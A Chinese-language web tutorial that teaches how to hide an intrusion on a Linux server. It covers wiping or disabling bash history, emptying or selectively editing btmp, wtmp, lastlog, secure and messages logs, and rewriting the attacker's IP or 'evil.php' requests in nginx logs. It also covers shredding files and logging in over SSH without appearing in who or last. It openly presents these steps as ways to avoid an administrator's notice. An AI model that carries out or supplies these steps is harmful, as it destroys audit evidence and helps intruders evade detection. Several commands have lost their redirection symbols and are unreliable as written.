共計 2774 個字符，預計需要花費 7 分鐘才能閱讀完成。

本篇內容主要講解“Linux 入侵痕跡怎么清理”，感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷，實用性強。下面就讓丸趣 TV 小編來帶大家學習“Linux 入侵痕跡怎么清理”吧!

01、清除 history 歷史命令記錄

第一種方式：

(1) 編輯 history 記錄文件，刪除部分不想被保存的歷史命令。

vim ~/.bash_history

(2) 清除當前用戶的 history 命令記錄

history -c

第二種方式：

(1) 利用 vim 特性刪除歷史命令

# 使用 vim 打開一個文件  vi test.txt #  設置 vim 不記錄命令，Vim 會將命令歷史記錄，保存在 viminfo 文件中。 :set history=0 #  用 vim 的分屏功能打開命令記錄文件.bash_history，編輯文件刪除歷史操作命令  vsp ~/.bash_history #  清除保存.bash_history 文件即可。

(2) 在 vim 中執行自己不想讓別人看到的命令

:set history=0 :!command

第三種方式：

通過修改配置文件 /etc/profile，使系統不再保存命令記錄。

HISTSIZE=0

第四種方式：

登錄后執行下面命令, 不記錄歷史命令 (.bash_history)

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export  HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

02、清除系統日志痕跡

Linux 系統存在多種日志文件，來記錄系統運行過程中產生的日志。

/var/log/btmp  記錄所有登錄失敗信息，使用 lastb 命令查看  /var/log/lastlog  記錄系統中所有用戶最后一次登錄時間的日志，使用 lastlog 命令查看  /var/log/wtmp  記錄所有用戶的登錄、注銷信息，使用 last 命令查看  /var/log/utmp  記錄當前已經登錄的用戶信息，使用 w,who,users 等命令查看  /var/log/secure  記錄與安全相關的日志信息  /var/log/message  記錄系統啟動后的信息和錯誤日志 

第一種方式：清空日志文件

清除登錄系統失敗的記錄：

[root@centos]# echo   /var/log/btmp [root@centos]# lastb // 查詢不到登錄失敗信息 

清除登錄系統成功的記錄：

[root@centos]# echo   /var/log/wtmp [root@centos]# last // 查詢不到登錄成功的信息 

清除相關日志信息：

 清除用戶最后一次登錄時間：echo   /var/log/lastlog #lastlog 命令   清除當前登錄用戶的信息：echo   /var/log/utmp # 使用 w,who,users 等命令   清除安全日志記錄：cat /dev/null   /var/log/secure  清除系統日志記錄：cat /dev/null   /var/log/message

第二種方式：刪除 / 替換部分日志

日志文件全部被清空，太容易被管理員察覺了，如果只是刪除或替換部分關鍵日志信息，那么就可以完美隱藏攻擊痕跡。

#  刪除所有匹配到字符串的行, 比如以當天日期或者自己的登錄 ip sed -i  / 自己的 ip/ d /var/log/messages #  全局替換登錄 IP 地址： sed -i  s/192.168.166.85/192.168.1.1/g  secure

03、清除 web 入侵痕跡

第一種方式：直接替換日志 ip 地址

sed -i  s/192.168.166.85/192.168.1.1/g  access.log

第二種方式：清除部分相關日志

#  使用 grep - v 來把我們的相關信息刪除, cat /var/log/nginx/access.log | grep -v evil.php   tmp.log #  把修改過的日志覆蓋到原日志文件  cat tmp.log   /var/log/nginx/access.log/

04、文件安全刪除工具

(1)shred 命令

實現安全的從硬盤上擦除數據，默認覆蓋 3 次，通過 - n 指定數據覆蓋次數。

[root@centos]# shred -f -u -z -v -n 8 1.txt shred: 1.txt: pass 1/9 (random)... shred: 1.txt: pass 2/9 (ffffff)... shred: 1.txt: pass 3/9 (aaaaaa)... shred: 1.txt: pass 4/9 (random)... shred: 1.txt: pass 5/9 (000000)... shred: 1.txt: pass 6/9 (random)... shred: 1.txt: pass 7/9 (555555)... shred: 1.txt: pass 8/9 (random)... shred: 1.txt: pass 9/9 (000000)... shred: 1.txt: removing shred: 1.txt: renamed to 00000 shred: 00000: renamed to 0000 shred: 0000: renamed to 000 shred: 000: renamed to 00 shred: 00: renamed to 0 shred: 1.txt: removed

(2)dd 命令

可用于安全地清除硬盤或者分區的內容。

dd if=/dev/zero of= 要刪除的文件  bs= 大小  count= 寫入的次數 

(3)wipe

Wipe 使用特殊的模式來重復地寫文件，從磁性介質中安全擦除文件。

wipe filename

(4)Secure-Delete

Secure-Delete 是一組工具集合，提供 srm、smem、sfill、sswap，4 個安全刪除文件的命令行工具。

srm filename sfill filename sswap /dev/sda1 smem

05、隱藏遠程 SSH 登陸記錄

隱身登錄系統，不會被 w、who、last 等指令檢測到。

ssh -T root@192.168.0.1 /bin/bash -i

不記錄 ssh 公鑰在本地.ssh 目錄中

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash  ndash;i

到此，相信大家對“Linux 入侵痕跡怎么清理”有了更深的了解，不妨來實際操作一番吧！這里是丸趣 TV 網站，更多相關內容可以進入相關頻道進行查詢，關注我們，繼續學習！